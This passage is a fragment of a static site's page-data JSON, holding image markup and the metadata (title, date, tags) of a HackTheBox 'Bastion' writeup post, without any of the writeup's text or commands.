0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAABP0lEQVQoz6WP226DMAyG8yrrQbsYUETLoQxyPtBAAkRVd7P3f46Ztuu6y2mfrOh3flu20f7Q1I3IDk1e0rKieUmqI1tt49UmXt5tsnndrbfJyzp6BFg3gc4fn4M/WxeEcVz1Qg9+vtghdP3spwuXNknLaFdIcKUlrMNUFxVpqYZiNE/TNE/jNIYQpnm0vZ3D5Lzz3jk3jKOHH84540IoJYQkhDYtxphgQhHBLeeUEEwXcNs2QjDGKGUEdItbyqjgrGneGYUaUh+PeZ4XCznq+1PXmZPtvIc5bhislALQShljwIJUaam17E6Q6rqG9jsINmKcQcWyGmcwBNyqKq+xUJZ3cdPPIFgSloFQShqjpOTkmsItQi5nLi4j2qgQxizbQ0/xDUrTdHclTR/yh8cPeFmWxXGcPIHe/kL0GxT9gy99sobXqs8i9AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9abb27afaa501a1317258cd0be1efebe/8ac56/image-20220814231730643.webp 240w,\n/static/9abb27afaa501a1317258cd0be1efebe/d3be9/image-20220814231730643.webp 480w,\n/static/9abb27afaa501a1317258cd0be1efebe/ff4b8/image-20220814231730643.webp 602w\"\n              sizes=\"(max-width: 602px) 100vw, 602px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9abb27afaa501a1317258cd0be1efebe/8ff5a/image-20220814231730643.png 240w,\n/static/9abb27afaa501a1317258cd0be1efebe/e85cb/image-20220814231730643.png 480w,\n/static/9abb27afaa501a1317258cd0be1efebe/32056/image-20220814231730643.png 602w\"\n            sizes=\"(max-width: 602px) 100vw, 602px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9abb27afaa501a1317258cd0be1efebe/32056/image-20220814231730643.png\"\n            alt=\"image-20220814231730643\"\n            title=\"image-20220814231730643\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>","fields":{"slug":"/hackthebox-windows-bastion-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-20","description":"Writeup for the HackTheBox retired machine 'Bastion'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"【Easy/Windows】Bastion Writeup(HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-bastion-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}